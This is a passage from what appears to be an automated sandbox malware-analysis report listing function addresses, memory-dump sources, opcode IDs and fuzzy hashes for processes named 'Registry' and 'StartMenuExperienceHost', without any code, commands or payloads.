                  • Opcode Fuzzy Hash: 40b59579455f3efcb266574b66dc942f09c11f3829b677d613dd012b4a5f4436
                  • Instruction Fuzzy Hash: 6AF0FF30D0D64F8EEB98AB6898083FA77E0FF56251F00027BE809D20D0EF2451908210
                  Function 00007FF848F31738 Relevance: .3, Instructions: 263COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.2155525376.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff848f30000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8ac6a4e13f3d9ac8bbbc8e3b0fee9022836413410637e9b85385c2cffe6ddb59
                  • Instruction ID: 094af16c4de83afd10c963a8a2e5fe203df25220a0e8e71c11bd480cf32295f8
                  • Opcode Fuzzy Hash: 8ac6a4e13f3d9ac8bbbc8e3b0fee9022836413410637e9b85385c2cffe6ddb59
                  • Instruction Fuzzy Hash: 6E718D31A0CA4A8FDB48EF2898516B977E2FF99744F14457AE44DC32C6CF34A842C785
                  Function 00007FF848F31DBD Relevance: .2, Instructions: 194COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.2155525376.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff848f30000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 994c4daccbcbc2c50f4ba35a6f7ef625d42a5c8c07c0337cf581c358a8ea2b10
                  • Instruction ID: 3ad49f772646a160bcffa8ee5e4b76101a4b2567a62cb1b6a2eccb1aa62d1582
                  • Opcode Fuzzy Hash: 994c4daccbcbc2c50f4ba35a6f7ef625d42a5c8c07c0337cf581c358a8ea2b10
                  • Instruction Fuzzy Hash: 3451BE31A0CA5A8FDB48EF1888555BA77E2FB98750F14467EE44AC3285CF34E842CB85
                  Function 00007FF848F332A5 Relevance: .2, Instructions: 169COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.2155525376.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff848f30000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a98978fd44bed0dfddec34a89f880dea623d9e4aee24bbaa2fef74104accc24c
                  • Instruction ID: 47be1b40db59ed65a098bc0c145c7d05419134bd38b8f090a48ff8bcaf5aeba4
                  • Opcode Fuzzy Hash: a98978fd44bed0dfddec34a89f880dea623d9e4aee24bbaa2fef74104accc24c
                  • Instruction Fuzzy Hash: 98512270D086198FEB54EBA8E4986EDBBB1FF58341F54413AD009E72D2DB38A944CB18
                  Function 00007FF848F3AEFA Relevance: .1, Instructions: 109COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.2155525376.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff848f30000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: def4a51ff039916f53f194718a3fcb32605dd9ec1b743ed0c0c6c84a857ddba9
                  • Instruction ID: 2aab9c4e90c376b263cda682e585b70f3b6b609009daa6b8ec7c77ce2f64a045
                  • Opcode Fuzzy Hash: def4a51ff039916f53f194718a3fcb32605dd9ec1b743ed0c0c6c84a857ddba9
                  • Instruction Fuzzy Hash: 1B31F2B1D0DD8A9FE745FB7998480A97BE0FF26390F0804BBC008C70D2EF2994858759
                  Function 00007FF848F3B1ED Relevance: .1, Instructions: 88COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.2155525376.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff848f30000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d733ac5259effc36f97f1b6cbf364071137b8a9dbd185590599ceae00326d8ab
                  • Instruction ID: 8444e90d195afd9b5d1f1727e18243205c6d9ca2a041abe3effb03d5bdd519c2
                  • Opcode Fuzzy Hash: d733ac5259effc36f97f1b6cbf364071137b8a9dbd185590599ceae00326d8ab
                  • Instruction Fuzzy Hash: 5531F570D1852A9EEB94EF94D8547ECB6F1FF58341F1081BAD00DE2291DB7869848B58
                  Function 00007FF848F3A5A1 Relevance: .1, Instructions: 75COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.2155525376.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff848f30000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 011a1694953a6273003c26924eb9ef3e5f4e18fef7a406aa80f45b8d09905e14
                  • Instruction ID: 038e4865229366b0507c4c3b2b90232c1bed0fdc9f6f59331f2444c71c24b88b
                  • Opcode Fuzzy Hash: 011a1694953a6273003c26924eb9ef3e5f4e18fef7a406aa80f45b8d09905e14
                  • Instruction Fuzzy Hash: 5F215E70918A4D8FDB89EF28C489AED7BF0FF2C305F01056AE80AC7291DB34A591CB40
                  Function 00007FF848F30A01 Relevance: .1, Instructions: 69COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.2155525376.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff848f30000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 82636e157201cac5f70459fe5e106fdb72f47548fc59d5fc36daa8c179b75b50
                  • Instruction ID: 47f5774d6657d993c437e60dba9f81fd811844e2e3de0a2118ae01758c071add
                  • Opcode Fuzzy Hash: 82636e157201cac5f70459fe5e106fdb72f47548fc59d5fc36daa8c179b75b50
                  • Instruction Fuzzy Hash: 67116A31D0994E9FEB80FB68D8492BD7BE0FF98390F4405B7D809C6192EF38A5448744
                  Function 00007FF848F334AC Relevance: .1, Instructions: 65COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.2155525376.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff848f30000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 9f087157f1a6077a6880632b0ab29f1974039027462d5829f9509bdd1ecfe812
                  • Instruction ID: ed6fda8cf73cf99532d9b3cbdaeecde8859b387920c10ee1e0f58dfc25e7bbee
                  • Opcode Fuzzy Hash: 9f087157f1a6077a6880632b0ab29f1974039027462d5829f9509bdd1ecfe812
                  • Instruction Fuzzy Hash: A121817084D78A4FD782EB7888595A97FF4EF4A310F0945EBD449CB0A2DB399445C721
                  Function 00007FF848F335C5 Relevance: .1, Instructions: 55COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.2155525376.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff848f30000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: dec51f2f12223879ee7558ef329eb2436002c3d9877235c0855af9b41763f44b
                  • Instruction ID: 184d7abbf25b3ad1357abd2fe42814305b71ea4db3bdac37de2f4cb8fb010530
                  • Opcode Fuzzy Hash: dec51f2f12223879ee7558ef329eb2436002c3d9877235c0855af9b41763f44b
                  • Instruction Fuzzy Hash: 3B115B7091D64E8FEB88EF6894596BDBBA0FF18341F4405BBD419C62D2EF39A5408B04
                  Function 00007FF848F32F31 Relevance: .1, Instructions: 53COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.2155525376.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff848f30000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 051fe0eee3750eccbaac313f5c7da3a221c66a7892aa8b608212bfe361a335c3
                  • Instruction ID: d6a2d509d9ebb7a4734a7c783437b2cc8322ecc0235aadcff3e47f5a243f7db3
                  • Opcode Fuzzy Hash: 051fe0eee3750eccbaac313f5c7da3a221c66a7892aa8b608212bfe361a335c3
                  • Instruction Fuzzy Hash: 67017C3091C64A9FE741BB7888496B97BE0FF59342F4545B7D808C60E6EB34E1548604
                  Function 00007FF848F305D8 Relevance: .0, Instructions: 50COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.2155525376.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff848f30000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f48917ee941a6dd76e01e77c82548d8e12f6985c7e4b3f76922f812ab0af55ef
                  • Instruction ID: b4847b53d7e932c8e6d04821f41bdd1b4263ff8fffde4b9fe5e9c525d95f550a
                  • Opcode Fuzzy Hash: f48917ee941a6dd76e01e77c82548d8e12f6985c7e4b3f76922f812ab0af55ef
                  • Instruction Fuzzy Hash: C8018830908A0E8FEB88EF24C0596BEB7A1FF69345F10447EE40EC21D1CB31A590CB84
                  Function 00007FF848F3290D Relevance: .0, Instructions: 47COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.2155525376.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff848f30000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: aed0a3b195ef23c86a19eb9df8cacbc321c43f7143ad180a76a6371e0d5eb885
                  • Instruction ID: a0b8870a87fbdd806314bdb5f088a288698a1e8aabc2dbfef0db671678cde602
                  • Opcode Fuzzy Hash: aed0a3b195ef23c86a19eb9df8cacbc321c43f7143ad180a76a6371e0d5eb885
                  • Instruction Fuzzy Hash: C801563090E64E8FE791FBA488896B97AE0FF59352F0548B7D408C60A2EB38A584D744
                  Function 00007FF848F3AAE9 Relevance: .0, Instructions: 45COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.2155525376.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff848f30000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4ae706e853044449059f1c8ed1ac9a4168291be6efcf2cfcb85d7a4c911af549
                  • Instruction ID: a09161d30d9bb344b6478ab4fddefc874672a36ff10eeca193e940760b86021c
                  • Opcode Fuzzy Hash: 4ae706e853044449059f1c8ed1ac9a4168291be6efcf2cfcb85d7a4c911af549
                  • Instruction Fuzzy Hash: E8018F3194DA899FE742BB7888591A97FE1EF1A381F0509F3D408C70E2EF28E4848711
                  Function 00007FF848F32FA9 Relevance: .0, Instructions: 43COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.2155525376.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff848f30000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 1cfcea7f00d2d42ba36723e44a09d51419d05a4822e98dff89f3076166238faa
                  • Instruction ID: 7502b56908dbbb7501197a593c3538fa399d58eba7b30db240d614bbdcafe475
                  • Opcode Fuzzy Hash: 1cfcea7f00d2d42ba36723e44a09d51419d05a4822e98dff89f3076166238faa
                  • Instruction Fuzzy Hash: 8201BC3090D68A4FE742BB78885D6A9BFE0EF09341F0508B3D408CB0E6EB38A4848310
                  Function 00007FF848F30608 Relevance: .0, Instructions: 42COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.2155525376.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff848f30000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 724fc92f50a9cbca55daed3ef072a14be0f2ceb46610833eb744e69f46c48749
                  • Instruction ID: e3899369a3bec797b2befc8815c4d7e0cc4f310fb288d019e938a8a26d28cadf
                  • Opcode Fuzzy Hash: 724fc92f50a9cbca55daed3ef072a14be0f2ceb46610833eb744e69f46c48749
                  • Instruction Fuzzy Hash: A9018C30819A0E9FEB58FB64C0582BA77A0FF18346F2008BFE40EC21D1DF39A590C604
                  Function 00007FF848F30610 Relevance: .0, Instructions: 42COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.2155525376.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff848f30000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 070964ae4b76cfa53e16b075fe05d287aa762788a12fd3d9ca37e40668c47118
                  • Instruction ID: 4838a92b2dbd99e5bb2402a7d7c12fd5717a14d66adbe5352b4859aee6ace496
                  • Opcode Fuzzy Hash: 070964ae4b76cfa53e16b075fe05d287aa762788a12fd3d9ca37e40668c47118
                  • Instruction Fuzzy Hash: 4C016930819A0E9EEB48EB6484586B9B7A0FF18346F20087FE81EC21D5DF35A594C714
                  Function 00007FF848F31D3D Relevance: .0, Instructions: 42COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.2155525376.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff848f30000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a4bc65f9b15171a1ed1820989b4c04fdc5dc13b90444197a76f9fb638367e28a
                  • Instruction ID: 13f3276aec4c588acf8cdf129e7ae245cbe4e9ff4a32e7adc1829ecac406ec70
                  • Opcode Fuzzy Hash: a4bc65f9b15171a1ed1820989b4c04fdc5dc13b90444197a76f9fb638367e28a
                  • Instruction Fuzzy Hash: 1601D13080DA8D8FDB99EF2484552B93BE1EF16300F4400BAE40CC61D2DB759494C780
                  Function 00007FF848F305D0 Relevance: .0, Instructions: 39COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.2155525376.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff848f30000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a8ab007326f85115e095df686c2d2f7f12b21a45bbfa9693a10374eaffd55489
                  • Instruction ID: ce9584cc5216da2694ebe11aff36f383cc6a774af6ef021e72d06b87c79a7dd9
                  • Opcode Fuzzy Hash: a8ab007326f85115e095df686c2d2f7f12b21a45bbfa9693a10374eaffd55489
                  • Instruction Fuzzy Hash: 34F06D3081DA8E8FEB98EF2494156FA77A4EF16348F50057AF80DC21D1DB39A594CB84
                  Function 00007FF848F32829 Relevance: .0, Instructions: 36COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.2155525376.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff848f30000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 358317bdeffacca13a1231ea6a57fa5f6d875d532ae7d2ef3d643c1a6dd1089d
                  • Instruction ID: 5a0ccee6f5e9671d5651663de679705fb049772410de61ef7fb088ee580e7902
                  • Opcode Fuzzy Hash: 358317bdeffacca13a1231ea6a57fa5f6d875d532ae7d2ef3d643c1a6dd1089d
                  • Instruction Fuzzy Hash: F9F0C23080E78E8FD75AAB3088541A93FA0FF16202F0504BBD408C60D2DB389444C741
                  Function 00007FF848F3289D Relevance: .0, Instructions: 33COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.2155525376.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff848f30000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6e630eb4be9baf69f4491a5ae1a83cbf1a88626cbccd0f5e17091c2512e07649
                  • Instruction ID: 3812d49761931d87c3e824dd0d90e1a6763a82e566a2b06946c636b4fcb47c77
                  • Opcode Fuzzy Hash: 6e630eb4be9baf69f4491a5ae1a83cbf1a88626cbccd0f5e17091c2512e07649
                  • Instruction Fuzzy Hash: 69F0E93085E78E9FD7496F7098142B93BA0FF56301F4105BBE809C50D2DF389558C711
                  Function 00007FF848F30F8E Relevance: .0, Instructions: 28COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.2155525376.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff848f30000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 65451e143e98a0743d3d4ba482ed711ca8fe1a15e5c0542eafa9fd8168551aef
                  • Instruction ID: f8735cef04c4cccdb415ab1080fdf54bfb9d43c7d18e4840ec834d0556151adb
                  • Opcode Fuzzy Hash: 65451e143e98a0743d3d4ba482ed711ca8fe1a15e5c0542eafa9fd8168551aef
                  • Instruction Fuzzy Hash: 43F01D3090A5198FEB50EB14C944BEEB7F1FB98345F1041B6D409A32D5DF396E848B58
                  Function 00007FF848F386C8 Relevance: .0, Instructions: 21COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.2155525376.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff848f30000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 48c82dc0f57b45cf7d3db02653334bf833c922603533d2ae3462411b959b7ccd
                  • Instruction ID: 1a43fe5467bd7f1a89d3602aa5a6159d8a901178ee4a8808a807db5c4bcc3342
                  • Opcode Fuzzy Hash: 48c82dc0f57b45cf7d3db02653334bf833c922603533d2ae3462411b959b7ccd
                  • Instruction Fuzzy Hash: 31E059B1D1D95ECEDBA5EB54C9447A876B1BB55345F6040FA820DE21D0DB382AC18F08
                  Function 00007FF848F37497 Relevance: .0, Instructions: 15COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000015.00000002.2155525376.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff848f30000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 19e52234b08fe96b60c110f043f71cc798f7e3e331db9339d78190f26c2a6093
                  • Instruction ID: a6aa97526ceec4781bf90a342e7cba9550ccc57cd9a8f1943d08036bc11c0b11
                  • Opcode Fuzzy Hash: 19e52234b08fe96b60c110f043f71cc798f7e3e331db9339d78190f26c2a6093
                  • Instruction Fuzzy Hash: 8CE04CB0D1C95D8EDBA4EB04C880BA8B7B1FB54345F1041FA824DE3280DB346AC19F08

                  Executed Functions

                  Function 00007FF848F1AE3D Relevance: 2.1, Strings: 1, Instructions: 868COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000016.00000002.2162744166.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_7ff848f10000_StartMenuExperienceHost.jbxd
                  Similarity
                  • API ID:
                  • String ID: {N_^
                  • API String ID: 0-1452172579
                  • Opcode ID: 8fa3695dc826269edca08a268269770363c4875ebad624fc1393c74ec760983c
                  • Instruction ID: b2a5d424c1fac0d77a17aa44a478db7fe4fa27b9038ed4f36fd63105b85826bc
                  • Opcode Fuzzy Hash: 8fa3695dc826269edca08a268269770363c4875ebad624fc1393c74ec760983c
                  • Instruction Fuzzy Hash: BC422832A0D6969FE745BB6CA8551F97BA0FF513A5F0401BBC14CCA0D3EF2C684583A9
                  Function 00007FF848F19D61 Relevance: 1.2, Instructions: 1207COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000016.00000002.2162744166.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_7ff848f10000_StartMenuExperienceHost.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2182776eb974baf1f7e53bc17e4eb84f98e3c3501ac7f22d5e9a69728c19ee4d
                  • Instruction ID: c0205c2cbfab4f7e063fead9c0e73834ca72851ef3f7cb9a7799ec995d30070d
                  • Opcode Fuzzy Hash: 2182776eb974baf1f7e53bc17e4eb84f98e3c3501ac7f22d5e9a69728c19ee4d
                  • Instruction Fuzzy Hash: 0C927C3090D7898FDB86EB3488696A97FF0FF1A301F0545EBD449C71A2DB38A985CB51
                  Function 00007FF848F1AD25 Relevance: .4, Instructions: 386COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000016.00000002.2162744166.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_7ff848f10000_StartMenuExperienceHost.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 621716dc2269be780799980e44a8dbbfcedb5aecb5a6bb63e3c5d83296b53a20
                  • Instruction ID: 4513d1b1800f2e9e67903a1b0c07f3c42c9764c4a116197b97c5646287dca97c
                  • Opcode Fuzzy Hash: 621716dc2269be780799980e44a8dbbfcedb5aecb5a6bb63e3c5d83296b53a20
                  • Instruction Fuzzy Hash: 60D1DE3190D68E8FEB99EF6498182FA7BA0FF55340F0405BBD809C71D2DB39A994C785
                  Function 00007FF848F12248 Relevance: 1.5, Strings: 1, Instructions: 269COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000016.00000002.2162744166.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_7ff848f10000_StartMenuExperienceHost.jbxd
                  Similarity
                  • API ID:
                  • String ID: H
                  • API String ID: 0-2852464175
                  • Opcode ID: 8c4c8007b779869ed69a2c82bfca7f64f2204da5a70c058fa99075f4c33e0b02
                  • Instruction ID: a45cfc75636ff64904ce168b196ff721130a82c324f98ce9b2222e50fa612b5a
                  • Opcode Fuzzy Hash: 8c4c8007b779869ed69a2c82bfca7f64f2204da5a70c058fa99075f4c33e0b02
                  • Instruction Fuzzy Hash: 32A18C30D0D65A8FEBA8EBA488957F8B6A0FF45380F1041BAD44D971C2DF786D85CB58
                  Function 00007FF848F1122D Relevance: 1.4, Strings: 1, Instructions: 156COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000016.00000002.2162744166.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_7ff848f10000_StartMenuExperienceHost.jbxd
                  Similarity
                  • API ID:
                  • String ID: PyH
                  • API String ID: 0-553442046
                  • Opcode ID: e63e652c6d7d6b09ee8502cf08ebcda36a4b22ba5be79b4fa2871b383a4e55e4
                  • Instruction ID: 8a428bc44f264f0a9ff794fad26a3fc3471f18b2eae97eb8bdefe9a1ade4d9c3
                  • Opcode Fuzzy Hash: e63e652c6d7d6b09ee8502cf08ebcda36a4b22ba5be79b4fa2871b383a4e55e4
                  • Instruction Fuzzy Hash: 7251BF30D0DA8E8FEB89EB68C8596F97BE0FF59351F0400BAD409D71D2EB25A884C751
                  Function 00007FF848F11240 Relevance: 1.4, Strings: 1, Instructions: 120COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000016.00000002.2162744166.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_7ff848f10000_StartMenuExperienceHost.jbxd
                  Similarity
                  • API ID:
                  • String ID: PyH
                  • API String ID: 0-553442046
                  • Opcode ID: 6758b37ec4733f4d24e03f1bd5eeaf4181861ef9b5db862f92ccd16265fc1dca
                  • Instruction ID: 720d12b2ff506dad4c37db16862eb3b9e10f23ae567975e0f5dc3962a673b140
                  • Opcode Fuzzy Hash: 6758b37ec4733f4d24e03f1bd5eeaf4181861ef9b5db862f92ccd16265fc1dca
                  • Instruction Fuzzy Hash: 6031E030D0DA8E8FEB98EB68C8186F97BE0FF59350F04107AD409D71D2EB24A884C751
                  Function 00007FF848F1C930 Relevance: .5, Instructions: 460COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000016.00000002.2162744166.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_7ff848f10000_StartMenuExperienceHost.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 110ec2710b56f19788c8658dbd2193369ec4953fb4a77c3d481fa9237c90e3ee
                  • Instruction ID: 6b7cbe2a7d768719f245f9c2f74a63566ed8ee34a387a9f294496121706d8c40
                  • Opcode Fuzzy Hash: 110ec2710b56f19788c8658dbd2193369ec4953fb4a77c3d481fa9237c90e3ee
                  • Instruction Fuzzy Hash: 6161CE3084DA8D8FDB46EB3498696B97BE0FF1A341F4405BAD409C70D2EF3AA544C711
                  Function 00007FF848F12D53 Relevance: .4, Instructions: 386COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000016.00000002.2162744166.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_7ff848f10000_StartMenuExperienceHost.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 81ad025250955ac4e8826d07ca41b15bf9d7a071728901ff0e1b5356f28ded81
                  • Instruction ID: 263446b4145eb9d6abe16ec6df5f86f25be888b86aca79668b4160127d854706
                  • Opcode Fuzzy Hash: 81ad025250955ac4e8826d07ca41b15bf9d7a071728901ff0e1b5356f28ded81
                  • Instruction Fuzzy Hash: 25D19E30D1D68A8FEB42FBB888596B97BE0FF1A341F0445B6D408C71E2EB38A944C755
                  Function 00007FF848F13138 Relevance: .3, Instructions: 324COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000016.00000002.2162744166.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_7ff848f10000_StartMenuExperienceHost.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: bafa0a2357e2149f17b86099ac3a20c66d78d73632207c01842fbfc840492485
                  • Instruction ID: fdc553e85f77e6fb20b6d3d72141d5b47e1946c8729f4880b270da6db175aa6c
                  • Opcode Fuzzy Hash: bafa0a2357e2149f17b86099ac3a20c66d78d73632207c01842fbfc840492485
                  • Instruction Fuzzy Hash: 0BB17830D0D6498FEB95EBA8C8986A9BBF0FF59341F0441BAD049D71E2DB38A844CB15
                  Function 00007FF848F10A01 Relevance: .3, Instructions: 303COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000016.00000002.2162744166.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_7ff848f10000_StartMenuExperienceHost.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e3948c950e0cc9470a875606b072241a5849c427266a2f87d9581939568fdf0a
